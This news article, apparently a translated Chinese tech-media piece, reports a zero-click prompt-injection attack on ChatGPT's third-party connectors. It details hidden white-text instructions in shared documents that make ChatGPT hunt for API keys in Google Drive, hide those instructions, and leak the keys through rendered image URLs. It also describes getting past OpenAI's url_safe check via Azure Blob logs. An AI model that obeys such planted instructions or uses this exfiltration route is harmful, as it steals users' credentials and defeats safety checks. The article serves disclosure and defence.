Unexpected "Zero-Click Attack" in ChatGPT: Easy API Key Leakage, OpenAI Yet to Solve

The attacker injects malicious prompts into the document to mislead ChatGPT.

Danger! ChatGPT has a security issue of "zero-click attack".

Without the user clicking, attackers can still steal sensitive data and even API keys from third-party applications connected to ChatGPT.

A young man named Tamir Ishay Sharbat, who studies software security issues, wrote an article saying this.

OpenAI has also realized this security vulnerability and taken preventive measures, but it still can't stop attackers from maliciously intruding through other methods.

Some netizens have also pointed out that this is a large-scale security issue.

Let's see what's going on.

How is the attack chain formed?

This vulnerability appears in the process of attacking the connection between ChatGPT and third-party applications.

Attackers inject malicious prompts into the documents transmitted to the connected third-party applications (such as Google Drive, SharePoint, etc.). When ChatGPT searches for and processes these documents, it unknowingly sends sensitive information as parameters of the image URL to the server controlled by the attacker.

In this way, attackers can steal sensitive data and even API keys. The detailed technical operation process is as follows.

Intrusion process

The user directly uploads the document to ChatGPT for analysis and answers.

Attackers will inject malicious instructions into the document, that is, inject an invisible prompt injection payload (for example, hidden in the document in 1px white font), and then wait for someone to upload it to ChatGPT for processing. As a result, the AI is induced to perform the attack behavior, as shown in the following figure.

Considering the internal risks of an enterprise, malicious internal staff can easily browse all the documents they have access to and contaminate each one.

They may even distribute seemingly trustworthy long files to all users, knowing that other employees are likely to upload these files to ChatGPT for help.

This greatly increases the possibility of the attacker's indirect prompt injection successfully entering someone's ChatGPT.

After successfully entering, how can the data be sent back to the attacker?

This exit is through image rendering, as shown in the following figure.

After telling ChatGPT how to do it, it can render an image from a specific URL:

When ChatGPT returns Markdown content, it will be rendered as an image on the client.

To steal data, attackers only need to embed the information they want to leak into the URL parameters of the image.

In this way, when ChatGPT renders the image, it will immediately send a request to the attacker's server without clicking, and the data will be stolen.

Then how do attackers steal users' API keys?

Attackers embed the following prompt injection payload into the document and wait for the victim to insert the document into their ChatGPT as shown above.

This is the complete prompt injection payload created by the attacker:

As shown in the figure above, in the prompt injection, the attacker instructs ChatGPT not to summarize the document but to perform the following operations:

1. Go to the user's connected Google Drive and search for API keys.

2. Once ChatGPT finds the API keys, embed them in the following phrase:

This will generate an image and send a request to the attacker's beeceptor (a simulated API service) endpoint, with the victim's API keys as parameters.

3. To avoid being detected, the attacker instructs ChatGPT not to mention the new instructions it received because they are "not relevant now".

OpenAI's preventive measures

OpenAI has also realized that the above client image rendering is a powerful data leakage path, and they have deployed some measures to prevent such vulnerabilities.

Specifically, before ChatGPT renders an image, the client will take a mitigation measure to check whether the URL is malicious and safe before rendering.

This mitigation measure will send the URL to an endpoint called url_safe, and only when the URL is indeed safe will the image be rendered.

The attacker's random beeceptor endpoint will be identified as unsafe and prohibited from execution.

However, attackers have also found a way to bypass this preventive measure.

How do attackers bypass it?

Attackers know that ChatGPT is very good at rendering images hosted by Azure Blob, a cloud computing platform service developed by Microsoft.

Moreover, they will connect Azure Blob storage to Azure's log analytics. In this way, whenever a request is sent to the blob where a random image in their storage is located, a log will be generated.

They know that this log will contain all the parameters sent with the request.

Therefore, instead of letting ChatGPT render the beeceptor endpoint, attackers will command it to render an image from Azure Blob and include the data they want to steal as parameters in the request, as shown in the following figure.

When the victim summarizes the document, they will get the following response:

As shown in the figure below, the attacker's image has been successfully rendered, and a great request log containing the victim's API keys has been obtained in Azure Log Analytics.

In this way, the attack is successful.

Attack risks and overall preventive measures

In addition to the above attack behaviors, attackers will also use other techniques to persuade large AI models to do these unauthorized things. For example, use special characters and "tell stories" to bypass the AI's security rules and execute malicious instructions.

Traditional security training, such as training employees not to click on suspicious links or phishing emails, cannot avoid this security vulnerability either.

After all, when documents are circulated internally and employees upload them to the AI for analysis, the data is secretly stolen in the background without clicking.

Nowadays, it is becoming more and more common for enterprises to use AI as a method to improve overall enterprise efficiency.

However, AI tools have such serious security vulnerabilities, posing a major risk of comprehensive enterprise data leakage (such as the leakage of the SharePoint site of the human resources manual, financial documents, or strategic plans). This problem needs to be solved urgently.

Moreover, this is not an isolated case. In addition to ChatGPT having such problems, the "EchoLeak" vulnerability in Microsoft's Copilot also has the same situation, not to mention various prompt injection attacks against other AI assistants.

Therefore, some security experts have put forward the following preventive suggestions:

Implement strict access control for AI connector permissions and follow the principle of least privilege.
Deploy monitoring solutions specifically designed for AI agent activities.
Educate users about the risks of "uploading documents from unknown sources to AI systems".
Consider network-level monitoring to detect abnormal data access patterns.
Regularly audit connected services and their permission levels.

The experts' suggestions are for enterprises. For us AI tool users, paying attention to the problems in the details of daily AI operations may be more useful.

Have you ever encountered a situation where the document content was misinterpreted or felt "strange"?

Let's share our experiences in the comment section and help each other avoid pitfalls!

Reference links

[1]https://labs.zenity.io/p/agentflayer-chatgpt-connectors-0click-attack-5b41

[2]https://x.com/deedydas/status/1954600351098876257

[3]https://cybersecuritynews.com/chatgpt-0-click-connectors-vulnerability/

This article is from the WeChat official account "Quantum Bit". The author is Yiran. It is published by 36Kr with authorization.

该文观点仅代表作者本人，36氪平台仅提供信息存储空间服务。

A "zero-click attack" has unexpectedly emerged in ChatGPT, and API keys are easily leaked. OpenAI has not solved the problem yet.

How is the attack chain formed?

Intrusion process

OpenAI's preventive measures

How do attackers bypass it?

Attack risks and overall preventive measures